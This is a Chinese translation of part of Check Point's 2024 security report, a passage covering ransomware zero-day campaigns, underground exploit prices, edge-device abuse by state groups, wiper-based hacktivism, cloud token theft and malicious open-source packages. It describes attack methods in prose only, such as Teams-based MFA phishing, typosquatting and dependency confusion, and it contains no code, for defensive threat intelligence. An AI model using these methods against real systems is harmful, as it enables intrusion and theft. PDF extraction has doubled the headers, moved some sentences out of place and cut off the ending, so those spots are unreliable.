年安全报告年安全报告就当前状态而言,“勒索软件”一词不仅指加密数据,还用于描述网络攻击,在这类攻击中,受经济利益驱使的执行者获得对受害者资产的重大控制权,并通过向受害者施压来勒索钱财。这一犯罪生态系统由不断变化的团体和个人组成,他们小心翼翼地把握着平衡,一边寻求公众关注和“名声”以吸引潜在关联方,并维护自己的信誉,一边避免自己引来执法部门的过多关注。这些执行者频频改名换姓,导致归因变得很困难。在分析勒索软件生态系统内的攻击趋势时,我们经常会研究勒索软件即服务(RaaS)提供商为增强其操纵能力而推出的新功能。这些包括中间加密机制或安全模式重启等躲避技术,以及加密速度的提升。其他增强包括扩展勒索策略,例如数据窃取和数据暴露威胁,以及实现被盗数据索引并与其他操作系统兼容。我们在 2023 年发现的另一个重要变化是,针对 Linux 的勒索软件版本已成为标配。2023 年的几起重大勒索软件攻击均利用了零日漏洞。与我们之前介绍的其他勒索软件趋势不同,其他攻击者是否采用此策略完全取决于经济层面的考虑:多受害者勒索软件攻击的收益是否能证明用于实现该攻击的零日漏洞的时价具有合理性?为了回答这个问题,我们仔细研究了这些攻击以及为这些攻击创造条件的生态系统。勒索软件零日攻击和大型攻击第第 3 3 章章27CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告值得注意的是,CL0P 选择不对受害者数据进行加密,而是威胁要公开或出售这些数据。这种勒索策略甚至会对那些定期维护备份和采用数据恢复程序的受害者造成不利影响。它还降低了在攻击的“嘈杂”加密阶段被发现的几率,并减轻了网络犯罪分子管理解密密钥的负担以及与多个文件解密相关的“客户服务”责任。零日漏洞攻击受到高度追捧,市场交易十分活跃。零日漏洞的价格取决于目标系统和漏洞的性质,从几千美元到 250 万美元不等(移动平台)。Zerodium 等合法平台公开宣布的价格反映了平行地下犯罪市场的情况。卖方在这些市场上的可信度取决于先前交易建立的信誉以及用作抵押的存款。在下面的截图中,拥有大量交易记录和存款的某地下卖家以 15 万美元的价格(谈判前)出售 Windows 本地权限升级(LPE)漏洞。相比之下,买方则可在 Zerodium 上以 8 万美元的价格购买 Windows LPE 漏洞。勒索软件对业务运营的影响不断升级,并在 2023 年达到顶峰,这一点从 ALPHV 入侵米高梅国际酒店集团等多起备受瞩目的攻击事件中即可见一斑。这种特定攻击导致大量数据失窃,业务运营遭到严重干扰,米高梅公司蒙受的损失据估算高达 1 亿美元。此外,澳大利亚港口运营商 DP World 遭遇了严重的勒索软件攻击,导致澳大利亚 40%的集装箱贸易中断数日。据称,此次攻击不涉及加密,这也体现了威胁不断演化的性质。过去一年中,殃及多个受害者的大规模勒索软件网络攻击显著增加,其中有些事件影响了数百甚至数千个组织。CL0P RaaS 组织利用 GoAnywhere 安全文件传输工具中的零日漏洞,致使受影响的 130 余个组织发生数据泄露。6 月初,CL0P 利用零日漏洞访问了 MOVEit 文件传输软件,导致超过 2600 家组织受到攻击。CL0P 早在 2021 年就进行过类似的攻击,当时它利用 Accellion 旧有文件传输设备中的零日漏洞入侵了多个客户端的数据库。在所有这些案例中,攻击目标都经过精心挑选,考虑了庞大的客户数量、数据质量以及将攻击扩散到更多受害者的能力。第第 3 3 章章28CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告MOVEit 攻击过后,利用零日漏洞进行勒索软件攻击的情形仍在继续。研究人员观察到,与 CL0P 相关的威胁执行者利用了 SysAid IT 支持软件中的零日漏洞,有 5000 多名客户可能因此受到影响。该公司在一份公告中披露,发现这一新漏洞(CVE-2023-47246)的时间为 11 月 2 日,但最早报告漏洞利用的时间则要追溯到 10 月。除了 CL0p,Akira 和 Lockbit 这两大高产勒索软件执行者也一直在利用 Cisco 设备中的零日漏洞(CVE-2023-20269),使攻击者能够对现有帐户进行暴力攻击。零日漏洞的有效期较短,因为利用次数越多,就越可能被发现,需要随后进行修补。与对恶意软件添加功能不同,对零日漏洞的投资无论是采取购买还是开发的方式,都意味着每次活动必须重复投入经常性成本,因此,只能以相对短期的攻击所产生的收入来弥补。利用零日漏洞是否会成为普遍做法,取决于每次攻击的直接收益。有关方面估计,CL0P 仅从 MOVEit 攻击中便可获利 7500 万至 1 亿美元。实际支付的赎金可能不好估算,但可以肯定,至少在某些情况下,支付金额足以覆盖零日攻击成本。图 1:地下论坛提供的零日 Windows LPE 漏洞。第第 3 3 章章29CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告高成本零日漏洞的利用能否呈现增长趋势,主要取决于经济考虑因素。如果威胁执行者确信潜在回报超过投资,我们可以预见此类攻击将会增加。对勒索行为让步能够在短期内解决眼前的危机,但长远来看只会让攻击者更加胆大妄为。有效防范零日攻击是一项复杂的挑战,凸显了实施终端反勒索软件解决方案、采用数据丢失防护(DLP)机制和推出扩展检测与响应(XDR)产品等有力措施的重要性。其他意在牟利的高级组织(例如 DarkCasino)利用 WinRAR 漏洞(CVE-2023-38831)从网上交易者手中窃取资金。Zerodium 为 WinRAR RCE 漏洞开出了 8 万美元的价码。在另一起事件中,贪图钱财的执行者在利用 Windows 通用日志文件系统(CLFS)中的零日漏洞提升权限后,部署了 Nokoyawa 勒索软件。在勒索软件部署领域,黑客会根据预计获得的潜在回报来决定是否使用高成本零日漏洞。我们必须确保他们的回报不会超过投资。为了应对这类攻击日益增长的风险,需要实施高级安全工具,包括反勒索软件解决方案、DLP 和 XDR。SERGEY SHYKEVICHCheck Point Software Technologies 威胁情报团队经理第第 3 3 章章30CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告路由器、交换机、VPN 硬件和安全设备等边缘设备在安全分析中常常不受重视。这类设备难以被记录和监控,缺乏 EDR 保护,加上本身就是安全设备,因此经常遭到忽视,而且使用的是默认密码,也并未得到充分的修补,或是未打补丁便结束生命周期。这些面向互联网的设备容易遭受攻击,经常被用来构建僵尸网络。例如,Mirai 恶意软件及众多衍生品恶劣地使用默认密码感染 Linux 路由器,然后利用它们进行 DDoS 攻击和垃圾邮件活动。这些攻击未必直接影响网络,因而几乎没有引起任何关注。对边缘设备的利用近来发生明显变化,现在由民族国家 APT 组织主导,用于为秘密行动构建隐形通信和渗透基础设施。Check Point 最近的研究报告披露了中国大陆一项利用专门的固件恶意软件针对 TP-Link 路由器开展的行动。政府支持的 APT 组织 Camaro Dragon 部署了名为“Horse Shell”的自定义后门程序,用来维持持久化并用于文件传输和网络隧道,从而通过受感染节点链实现匿名通信。该组织将入侵的路由器作为 C&C 混淆的隐蔽网络,这种方法在以往的报告中称为 RedRelay 和 ZuoRAT,在 2023 年继续得到普遍采用。边缘设备在安全策略中往往并未得到足够的重视,很久以来一直被网络犯罪分子用于设置僵尸网络以进行 DDoS 攻击,并用于策划垃圾邮件活动。而从眼下的趋势来看,边缘设备已成为民族国家 APT 组织与受经济利益驱使的高级威胁执行者的攻击目标,执行者将这些设备用作复杂的外渗基础设施的一部分,或是作为切入点,用于对仔细挑选出的实体和设备的网络系统进行渗透,这一趋势在本年度达到顶峰。这种策略最初由国家执行者利用昂贵的零日漏洞和定制恶意软件来实施,之后被一些以敛财为目的的老练组织所采用,他们利用未修补系统中的错误配置和已知漏洞进行勒索软件攻击。攻击面不断扩大:边缘设备的新风险第第 3 3 章章31CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告与 Camaro Dragon 不同的是,此案中使用的并不是专门的固件恶意软件,而是由生命周期结束的 Cisco 和 DrayTec 路由器以及 NETGEAR 防火墙组成的 KV-botnet。美国关键基础设施中的 Fortinet FortiGuard 设备也被分别攻破,成为用于间谍活动和潜在破坏的网关,通过 KV-botnet 进行隐蔽通信。用来攻击边缘设备的不仅仅是生命周期结束的未修补已知漏洞。Mandiant 研究人员报告称,UNC3886 和 UNC4841 等中国大陆 APT 组织大量利用零日漏洞并使用定制恶意软件向边缘和网络设备发起攻击。UNC3886 使用专门的定制恶意软件向未部署 EDR 解决方案的 Fortinet 安全设备以及 VMware 服务器和设备发起攻击。边缘设备在攻击中不仅用作通信基础设施的组成部分,同时也是网络的初始入口点。在 Microsoft 5 月报告的一次复杂行动中,中国大陆政府支持的 APT 组织 Volt Typhoon 采用了双重策略。该组织利用 SOHO(小型办公室/家庭办公室)边缘设备,将其集成到后来称为 KV-botnet 的通信基础设施中。该僵尸网络随后被用于伪装来自美国关键基础设施组织内其他遭入侵边缘设备的命令和控制(C&C)通信。第第 3 3 章章32CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告2023 年末,俄罗斯 APT 组织 Sandworm 将其网络攻击范围扩大到乌克兰以外,目标锁定丹麦的基础设施和能源部门。该组织利用 Zyxel 防火墙中的两个零日漏洞对 22 个丹麦实体实施了攻击,标志着攻击行动大幅升级。这一战略举措意图破坏丹麦的关键设施,针对易受攻击的边缘设备,为攻击者在已入侵平台上提供远程代码执行(RCE)功能。多家公司因此被迫停止正常运营,暂时采取“孤岛模式”运作。这一转变体现了 Sandworm 广泛利用漏洞和协调大规模攻击的能力。利欲熏心的勒索软件组织同样将边缘设备作为目标。CACTUS、Akira 和 LockBit 在其攻击中利用了配置错误或易受攻击的 Citrix 和 Fortinet VPN 设备。FIN8、LockBit 和 Medusa 等组织利用 Citrix NetScaler 设备中未修补的严重漏洞对大型公司实施入侵。这些攻击已发展到部署持久化 webhell,此类脚本甚至在设备打补丁并重启后也仍然保持活动状态。利用边缘设备实施入侵的最终目的常常是在已入侵网络上部署勒索软件攻击。UNC4841 利用另外一种边缘设备 Barracuda Email Security Gateway(ESG)的零日漏洞开展全球间谍活动。在本年度报告的一次更为严重的攻击中,攻击者以全球公共和私营部门实体为目标,重点针对美洲地区的实体。在已确认的受影响组织中,有近三分之一为政府机构。为应对检测和缓解措施,攻击者还部署了额外的恶意软件,目的是对部分已入侵实体维持持久化。鉴于此次持续性攻击来势汹汹,供应商强烈建议更换所有 ESG 设备,以消除安全隐患。边缘设备并非只被中国大陆攻击者利用。俄乌冲突期间,与俄罗斯军事情报机构有关的 APT 组织广泛使用这一策略来对付乌克兰目标实体。冲突爆发以来,一连串的网络攻击严重破坏了乌克兰的能源、媒体、电信和金融行业以及政府机构。这些攻击的强度和量级随着对边缘设备的入侵而增加,使俄罗斯威胁执行者能够持续访问目标网络,并在一段时间内发动多次攻击。研究人员观察到与俄罗斯有关的 APT28 组织部署了 JaguarTooth 恶意软件,专门利用 CISCO IOS 路由器中的漏洞。这些漏洞早在 2017 年就已被报告过,但事实证明如今仍然有效。第第 3 3 章章33CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告边缘设备以往主要是类似 Mirai 的僵尸网络进行垃圾邮件和 DDoS 攻击的目标,现在则由更老练的执行者用来进行精确操作。这类设备被用作其他活动的通信基础设施、初始接入点或破坏其原始网络的手段。民族国家执行者最初将其作为高级方法用于获取隐蔽的访问权限,后来则成为图谋钱财的攻击者在使用现有工具包时所采取的手段。事实证明,这种针对边缘设备的集中攻击可以有效攻破重点目标,同时长时间规避检测。如果没有及时的补丁、足够的监控和检测系统(特别是针对边缘设备),面向公众的网络设备将继续成为巨大盲点。随着威胁形势不断演变,我们的安全解决方案和监控能力也应发展进化。边缘设备面临的漏洞利用威胁不断升级,要求我们重新调整安全策略。我们必须强化网络安全基础设施。防范复杂的边缘设备攻击对于 2024 年的企业至关重要,本节为此提供了非常实用的建议。ELI SMADJACheck Point Software Technologies 安全研究团队经理第第 3 3 章章34CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告这种新型作案手法还有一个特点,即越来越多地使用 Wiper,旨在最大限度减少运营中断。值得注意的是,这些趋势在俄乌冲突期间成型,与当前的巴以冲突存在相似之处。不过,尽管这些活动保持高强度并且资源投入巨大,它们对冲突态势的实际影响却值得怀疑。Anonymous Sudan 是 2023 年初出现的实体,通常认为与俄罗斯有关,该组织一直假借支持伊斯兰事业的名义频繁对西方实体出手。该组织在全球范围内实施了多次分布式拒绝服务(DDoS)攻击,对关键基础设施和众多其他行业造成影响。Anonymous Sudan 的主要攻击目标包括 Microsoft、Twitter(X)、Telegram 和北欧航空等公司的基础设施和网站。Anonymous Sudan 组织成立仅一年,就已发动多起有记录以来最成功的 DDoS 攻击,包括对 Microsoft 服务的重大攻击。该组织在行动中与 Killnet 等与俄罗斯有关的攻击组织合作,在实施与俄乌冲突和反西方实体相关的网络活动时尤其如此。与其他黑客组织不同的是,Anonymous Sudan 据信利用租用的服务器基础设施进行攻击,这表明该组织拥有雄厚的资金支持。根据这些特征,加上该组织主要使用英语和俄语而极少使用阿拉伯语黑客行动主义通常利用网络攻击来促成政治或社会目标,其性质近年来已发生显著变化。它最初以草根个人和组织松散的集体为特征,如今则转向政府的实质性参与。就目前形式而言,大部分网络活动的实施者都是具有政府背景的黑客组织。这些实体充当先锋,为民族国家高级持续性威胁(APT)组织所实施活动的收益摇唇鼓舌。民族国家隐藏在黑客组织的幌子背后,营造一种民众支持的假象,同时与攻击撇清干系,以免招致打击报复。政府背景的黑客行动主义和 Wiper 成为新常态第第 3 3 章章35CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告与伊朗有关的黑客组织 KarMa 于 10 月 8 日开通其英语 Telegram 频道,迅速获得广泛关注,订阅者过万。KarMa 充当网络角色,是伊朗情报与安全部(MOIS)的网络前线,该部门操纵着“Scarred Manticore”APT、Dev-0842 和其他几个组织。KarMa 通过其 Telegram 频道传播从 Scarred Manticore 潜入以色列实体的间谍行动中获取的信息。其中一些入侵行动还伴随着 Wiper 攻击,对受影响公司的基础设施造成破坏。所部署的 Linux 和 Windows 专用擦除恶意软件名为“BiBi-Wiper”(源自以色列总理本雅明内塔尼亚胡的昵称),被认为是 Dev-0842 的手笔。随着破坏性恶意软件日益盛行,这种典型现象已成为黑客行动的新常态。与伊朗有关的执行者曾在 2022 年对阿尔巴尼亚政府实体使用过同样的行动模式。在一系列攻击中,名为“Homeland Justice”的网络角色通过其所运营的专用 Telegram 频道和网站,在阿尔巴尼亚政府实体的系统被攻破并遭受 Wiper 攻击后,将这些实体的材料予以外泄。这些攻击由与 MOIS 有关的执行者实施,Scarred Manticore 和 Dev-0842 均位列其中。这些与伊朗有关的组织使用网络角色来操作专用通信渠道,将取得的材料外泄并实施 Wiper 攻击,这种模式反映了组织所采用的一贯策略。2023 年 12 月,伊朗“Homeland Justice”恢复活动,对阿尔巴尼亚主要实体发动了另一波破坏性网络攻击。(尽管阿拉伯语是苏丹的官方语言),研究人员推测其与俄罗斯存在明确联系,或是得到俄罗斯政府的支持。2023 年 12 月,乌克兰最大的移动网络运营商 Kyivstar 遭受了自俄乌冲突爆发以来最大规模的破坏性攻击。此前低调行事的黑客组织 Solntsepyok 表示对此次攻击负责。乌克兰认为这次黑客行动主义活动与俄罗斯军事情报机构操纵的 APT 组织 Sandworm 有关联。据报道,此次攻击彻底摧毁了该电信运营商的核心网络。近年来,伊朗也大力发展和利用其网络能力,同时非常注重网络造势行动。在巴以冲突期间,这一趋势有所升级。与背靠俄罗斯政府的黑客行动主义主要侧重分布式拒绝服务(DDoS)攻击不同,有伊朗背景的黑客组织采用更为激进、技术更成熟的方法,重点实施破坏性的破解和泄露(hack-and-leak)行动。长期以来,伊朗一直都在资金援助和军事操练方面为哈马斯提供强有力的支持,自 2023 年 10 月 7 日冲突爆发以来更是进一步加大了支持力度。伊朗采取了与俄罗斯类似的战略,部署网络“黑客”势力,参与到数字战争中。第第 3 3 章章36CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告与 MOIS 有关的 APT 组织 Agrius(或称 DEV-0227)于 2023 年 11 月下旬对以色列 Ziv 医院发动了单独攻击。Agrius 以往曾部署过有时伪装成勒索软件的 Wiper,不过据称,虽然此次对 Ziv 的攻击窃取了敏感信息,但并未破坏该医院的网络。与 KarMa 的运作方式类似,被盗数据随后在另一个名为 Malek Team 的网络角色的 Telegram 频道和网站上被发布,该角色在战事初起时也曾露面过。Cyber Toufan Operations 是近来被推到前台的又一个与伊朗有关的网络角色,于 2023 年 11 月登场,承担阿拉伯语和英语 Telegram 频道的运营。在以色列一家托管服务提供商遭到入侵后,该组织披露了从以色列多家企业获得的信息。与之前的事件类似,这次攻击先是窃取数据,随后部署了破坏性恶意软件。另有一些与伊朗有关的黑客组织一度蛰伏,但在当前冲突期间重新活跃,其中包括 AlToufan 和 Moses Staff,这些组织被认为由伊朗革命卫队(IRGC)所控制。这些网络行动很大一部分侧重于信息战和心理战,其主要目标是披露所谓的成功网络攻击,突出目标受害者如何不堪一击。这些威胁执行者通常会夸大实际发生的破坏性行动的影响,还会发布虚构攻击的新闻或数据。Cyber Av3ngers 是一家为与伊朗相关的活动充当掩护的组织,该组织公布了可追溯到 2022 年的攻击细节,其中一些此前早已由其他组织报告过。其他几个网络组织也采用了这种将真实漏洞报告与杜撰报告嫁接糅合的策略,其中名为 Soldiers of Solomon 的组织与 Cyber Av3ngers 关系密切。这些组织的主要关注点是可编程逻辑控制器(PLC)和物联网摄像头。舆论认为,Cyber Av3ngers 和 Soldier of Solomon 都听命于 IRGC。俄乌冲突期间,俄罗斯的网络行动在冲突爆发后几个月扩大到了其他西方国家,特别是北约成员国,与此类似,伊朗的网络活动也将其触角向西延伸。例如,Cyber Av3ngers 通过攻击以色列制造的数字控制面板入侵了美国和爱尔兰的几处供水设施。从乌克兰冲突中观察到的模式来看,最近的冲突中发生的网络活动并不仅仅属于政府背景黑客组织的范畴。在巴以冲突最初几周,网络战格局中出现了众多地区性黑客组织,绝大多数与伊斯兰教有关,他们加强了活动,并形成数百个新的反以色列黑客组织。第第 3 3 章章37CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告黑客行动主义已经发展到一定程度,政府支持团体如今主导了大部分有影响力的网络活动。尽管敌对政府的参与程度越来越高,破坏性和扰乱性活动也日益受到重视,但这些网络行动的实际效果仍有待商榷。这些活动很大一部分常常不为主流媒体所注意,与常规战事报道相比显得无足轻重。因此,这些网络行动给公众舆论留下的印象往往微乎其微。考虑到此类网络行动的现实影响有限,不禁让人怀疑是否已为其分配了合理的资源。持续评估这些由政府支持的网络行动的有效性,对于确定其在未来的现代战争战略中扮演何种角色具有重要意义。这些组织主要在 Telegram 上出没。这些有机关联的黑客实体开展的行动主要涉及小规模 DDoS 攻击和网站篡改。这些活动通常影响较小,其作用很大程度上仅限于在 Telegram 频道上分享的屏幕截图。不过,大量 DDoS 攻击出现在冲突早期阶段,以色列网站则是其密集攻击的目标。在此期间,与俄罗斯有关的黑客组织并未保持中立。值得注意的是,Anonymous Sudan 声称对数起针对以色列的网络攻击负责。其中包括对用于向平民发出导弹来袭警报的以色列官方应用程序的攻击,以及对以色列主要英文报刊耶路撒冷邮报数字域名的攻击。在网络战争中很难做到“知己知彼”,敌情比以往更为复杂,黑客组织背后常常隐藏着不为人知的利益。公共和私营部门实体都容易受到黑客攻击,而攻击的频率和规模主要取决于地缘政治事件。OMER DEMBINSKYCheck Point Software Technologies 数据研究团队经理第第 3 3 章章38CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告历经 COVID-19 疫情以及随后向远程办公模式的转变,本地资产和云端资产之间的区别已显著缩小。用户需要远程访问系统时,组织必须借助强大的身份验证服务来确保登录安全。第三方应用程序单点登录(SSO)机制的普及进一步增加了潜在的风险,因为单点故障可能导致对多个服务开放权限。为了防范或缓解凭据盗窃和凭据填充攻击,企业已经升级了安全协议,强制使用多因素身份验证(MFA)等更强大的身份验证方法。道高一尺,魔高一丈,威胁执行者也制定了躲避这些强化安全措施的策略,主要是利用从已通过身份验证的会话中窃取的访问令牌。民族国家执行者以及受经济利益驱使的网络犯罪分子都采用了这些策略。此前记录的中间人攻击通常利用 Evilginx 等框架拦截受害者与服务提供商之间的通信以破解用户凭据和令牌,最近的这些攻击则与之相反,大多数是直接从第三方或云服务提供商处恢复令牌。敏感数据的访问管理和清理是极具挑战性的任务,尤其是在需要处理大量数据的情况下。这一过程可能导致访问令牌不慎暴露,甚至在专业组织中也是如此。2023 年 9 月,Microsoft 不恰当地使用了不受限制的 Azure SAS 令牌来共享开源人工智能训练数据存储桶,造成 38 TB 数据意外泄露,其中包括敏感信息、私钥和密码。通常情况下,攻击者需要付出更多努力才能攻破网络系统。在 7 月发现的一次复杂网络攻击中,名为 Storm-0558 的中国大陆 APT 组织成功入侵了至少 25 个组织的大量电子邮件帐户,其中包括多个美国联邦机构。实施入侵期间利用了窃取的 Microsoft 帐户(MSA)用户签名密钥。该密钥用于在用户登录 Microsoft 帐户过程中对令牌进行数字签名和身份验证,对于 Microsoft 安全基础设施不可或缺。根据 Microsoft 的调查结果,这次攻击的源头很可能是 Microsoft 某个工程师帐户遭到入侵,攻击者由此进令牌遭受攻击:云计算的致命 弱点第第 3 3 章章39CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告入该工程师的调试环境。在该环境中,攻击者找到了无意间遗留在未经清理的崩溃转储中的 MSA 密钥。随后,攻击者利用该密钥为 Outlook Web Access 和 O 生成欺诈性身份验证令牌,得以在未经授权的情况下访问了多个客户帐户。值得注意的是,泄露的密钥可以追溯到 2021 年 4 月。此类攻击并不局限于针对云服务提供商。托管服务提供商、身份验证公司以及任何可能拥有访问令牌和相关敏感信息的实体也会成为攻击目标。在 2023 年 10 月发生的一起引人注目的事件中,身份和验证供应链的重要组成部分 Okta 经历了严重的安全漏洞攻击,整个客户支持用户群都受到了影响。此次攻击通过窃取的凭据发起,允许未经授权用户访问 Okta 的客户支持管理系统。这种访问进一步导致客户上传文件外泄,其中包括含有 Cookie 和会话令牌等关键数据的 HTTP 存档(HAR)文件。如果在上传之前未进行清理,这些受损工件可能被用于登录或劫持系统会话。客户后来报告称,有攻击者试图利用窃取的工件对其系统进行未经授权的访问。Okta 在 2022 年就已遭受过一次严重攻击。在某些情况下,网络犯罪分子会利用对基于云的协作服务(例如 Microsoft Teams)的访问来发起社会工程学攻击。Microsoft 在 2023 年 8 月报告了一起重大案例,涉案者是名为 Midnight Blizzard 的俄罗斯 APT 组织。该组织利用 MS Teams 躲避多因素身份验证(MFA)程序并获取用户令牌。最初,Midnight Blizzard 只是渗透到小型企业的 Microsoft 365 租户中,以技术支持实体的名义在这些租户中创建新域。随后,攻击者就利用这些域,通过 Microsoft Teams 发起网络钓鱼攻击,试图从外部公司的用户那里获取 MFA 代码。攻击方法包括由攻击者冒充技术支持或安全团队,通过 Teams 发送聊天请求和消息。这些请求和消息会说服用户在其 Microsoft Authenticator 应用程序中输入特定代码,这样攻击者便能访问用户的 Microsoft 365 帐户并从事其他未经授权的活动。第第 3 3 章章40CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告使用窃取的令牌进行网络攻击可能采取自上而下的方式,比如在对 Microsoft 和 Okta 的攻击中,攻击者可在入侵服务提供商系统后访问其客户的系统。攻击过程也可能采用自下而上的方式,从入侵客户系统开始。在这种情况下,攻击者可在找到令牌和敏感数据后渗入云服务,并在受害者的整个网络中进行横向移动。以色列一所知名大学就曾发生过此类攻击。在报告的破坏性攻击中,与伊朗政府有关的执行者向一流大学以色列理工学院实施了渗透。攻击者利用未修补的漏洞获得内部访问权限,最终进入有权访问 Azure AD 代理的特权帐户。他们随后提取了 Azure AD 特权帐户的明文凭据,进而对 Azure 环境进行大肆破坏,删除了服务器群、虚拟机、存储帐户等等。云基础设施管理的远程性质为身份验证和安全带来独特的挑战。最近的攻击趋势表明,云安全比以前认为的要更容易受到影响。高级威胁执行者愈发趋向于绕过终端用户,直接以云服务提供商为攻击目标。这种转变令人担忧,需要所有相关利益方合力应对。除了传统的配置管理和多因素身份验证(MFA)以外,纳入全面的数据清理方法对于确保在云环境中建立强大的安全防护至关重要。随着云服务领域的发展,新的安全风险不断出现。上一年发生的事件表明,化解最新云安全问题并非易事,需要采用具有创新性的方法。目前亟待制定强有力的方案,阻止威胁执行者将最终用户和服务提供商作为攻击目标。LOTEM FINKELSTEENCheck Point Software Technologies 威胁情报与研究主管第第 3 3 章章41CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告数十年来,软件开发人员一直使用第三方软件包和程序库来为开发周期提速。随着 PyPi、NPM、NuGet 和 RubyGems 等开源软件包管理平台的出现,根据任何需要和目的获取丰富的软件包变得前所未有地简单。遗憾的是,与所有流行事物一样,威胁执行者也会想方设法滥用它们来谋取私利。恶意软件包一直是一大安全顾虑,特别是在企业环境中。过去一年中,通过开源软件包平台传播的恶意软件数量大幅增加,仅在 2023 年第一季度就发现了约 6800 个恶意软件包。全年有数十万用户下载了这些恶意软件包。仅年度排名前五的恶意软件包活动就导致了 30 万次下载和潜在感染。Python 的.py 文件在从互联网下载的恶意文件中占到 7%的比例,这一数字在我们上一份年度报告中仅为 3%。所有这些都来自几种常见的攻击向量,例如软件包名称误植、软件包品牌劫持和依赖项混淆攻击。这些风险无不凸显了代码合法性验证的重要性,对于由未知软件开发人员编写的代码尤其如此。在软件开发过程中,程序员通常会使用既有软件包,其中包含来自代码共享源的所需功能。这种普遍做法有几个优点,比如可以减少编写代码和提出复杂问题解决方案所需的时间。在大多数情况下,既有代码可以高效执行,并且已针对错误和边缘情况进行了测试。因此,每种编程语言都有大量开源库和软件包。PIP 安装恶意 软件:软件存储库遭受攻击第第 3 3 章章42CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告创建恶意开源软件包通常简单易行,但其产生的影响可能举足轻重。在这类攻击中,威胁执行者的目标不仅包括下载恶意软件包的开发者,还包括这些开发者的客户(使用他们信任的软件),由此引发软件供应链攻击。过去数年中,威胁执行者开发了若干针对开源软件包平台的主要攻击向量,安全研究人员已证明这些攻击向量具有可行性。其中最常见的是误植域名。在这类攻击中,威胁执行者发布的恶意软件包会采用带有轻微拼写错误的名称,或是属于流行的合法软件包的变体,希望用户无意中下载恶意版本。安装软件包时通常会使用“package_manager_name install package_name”(例如“npm install async”)这样的命令。因此,软件包名称中的小错误可能会让用户在不知情的情况下安装恶意软件包。2023 年 6 月,研究人员发现了一项包含 160 多个恶意 Python 软件包的活动,下载量超过 4.5 万次。威胁执行者上传了与一些最流行的软件包类似的 Python 软件包。其中名为“reaquests”的恶意软件包意图模仿被数百万用户广泛用于 HTTP 请求操作的 Python 软件包“requests”。使用开源库和软件包会引发一些可能被威胁执行者利用的安全问题。由于开源库的性质,任何人都可以贡献和上传自己的代码,因此很难跟踪和验证共享代码。PyPI(Python 软件包索引)就是典型的例子,它是 Python 编程语言软件包的主要存储库。尽管 PyPI 最近试图减轻这些威胁,但它仍然严重依赖用户报告来确保软件包安全。在相关人员接到报告再执行删除时,恶意软件包往往可能已被下载数百次。大多数程序员在将开源代码添加到自己的代码中之前,并不会检查其完整性。理解他人编写的代码流程并不容易,更不必说包含数千行代码的情况。在很多情况下,程序员并不了解一段代码中所有可能的内在安全风险,即使他们对代码进行了审查,也仍然可能遗漏恶意工件。这些恶意组件可能感染目标网络,窃取及外泄敏感信息(例如密码和信用卡信息),并下载其他恶意软件组件。第第 3 3 章章43CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告在近期针对 Mac 计算机的攻击中,威胁执行者创建了加密库 Cobo Custody Restful 的恶意版本用来部署恶意软件。恶意版本与合法版本同名,并存储在 PyPI 注册表中。威胁执行者利用了该软件包没有通过 PyPI 注册表进行正式分发而仅通过 GitHub 分发的实际情况。如果未明确指定安装目标位置,pip 安装管理器会优先安装恶意 PyPI 版本,而不是合法的 GitHub 版本。遭到利用的不只是软件包管理平台。威胁执行者还试图控制托管开源代码(例如 GitHub)的现有合法帐户,在合法软件包中添加恶意代码。研究人员演示了这种方法,他们通过获取与其中一名软件包维护者相关的过期域名,接管了每周下载量超过 350 万次的流行 NPM 软件包。恢复后的域名允许他们重置 GitHub 密码,从而可以发布 NPM 软件包的木马化版本。不止 Python 库,所有使用开源代码共享的资源库都成为了攻击的目标。NuGet 存储库是一种开源软件包管理器兼.NET 库的软件分发系统,被用来发起大规模误植域名活动。这些欺诈性软件包在一个月内被下载超过 15 万次,之后才被从 NuGet 存储库中删除。恶意软件包中包含的 PowerShell 脚本会在安装后执行,并触发下载第二阶段有效负载。最后的有效负载是名为“Impala Stealer”的自定义加密货币窃取程序,可以窃取加密货币交易平台的用户凭据。网络犯罪分子并不只是利用拼写错误来传递恶意软件包。在软件包品牌劫持中,威胁执行者会创建与合法软件包同名的恶意软件包,希望以此欺骗用户下载。第第 3 3 章章44CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告图 2:在地下论坛上分发的 PyPI 恶意软件。混淆。这次攻击影响了数千台机器,导致信息遭到窃取。恶意开源软件包的使用者包括高产威胁执行者和政府支持的执行者。后续攻击被认为是由臭名昭著的朝鲜组织 Lazarus 所为。2023 年 8 月,该组织向 PyPI 存储库上传多个恶意软件包。他们将其中一个软件包伪装成名为“vConnector”的 VMware vSphere 连接器模块,另有一个软件包则模仿的是“prettytable”,该热门 Python 工具可用于以美观的 ASCII 格式打印表格。合法软件包“prettytable”每月下载量超过 900 万次,恶意版本“tablediter”则获得 736 次下载。与软件包品牌劫持不同,依赖项混淆攻击欺骗的是软件包管理器而不是用户。许多软件包管理器会在软件构建过程中下载依赖项,威胁执行者利用这种方式来实施漏洞攻击。攻击者在公共存储库中发布与流行软件包同名的软件包,而原始软件包位于私有存储库中。这会诱骗软件安装程序脚本提取恶意代码文件。2023 年 4 月的一份研究报告指出,有 49%的组织容易受到这种攻击向量的攻击。安全研究人员在年初发现,由 Meta Platforms 开发的应用广泛的机器学习框架 PyTorch 遭到入侵。攻击的起因是威胁执行者向 PyPI 存储库上传了与合法软件包同名而版本号更高的恶意软件包,造成依赖项第第 3 3 章章45CHECK POINT SOFTWARE|2024 2024 年安全报告年安全报告牌劫持和依赖项混淆等攻击一波未平一波又起,也暴露了这些平台的局限性。PyPi、NPM 和 NuGet 等软件包管理平台很容易遭到利用,凸显了对增强型安全协议和全面代码审查实践的迫切需求。开发人员必须优先考虑安全问题,以保护最终用户免受这些恶意渗透的影响。此外,在俄语地下论坛上,Check Point 研究人员还观察到有人在分发针对 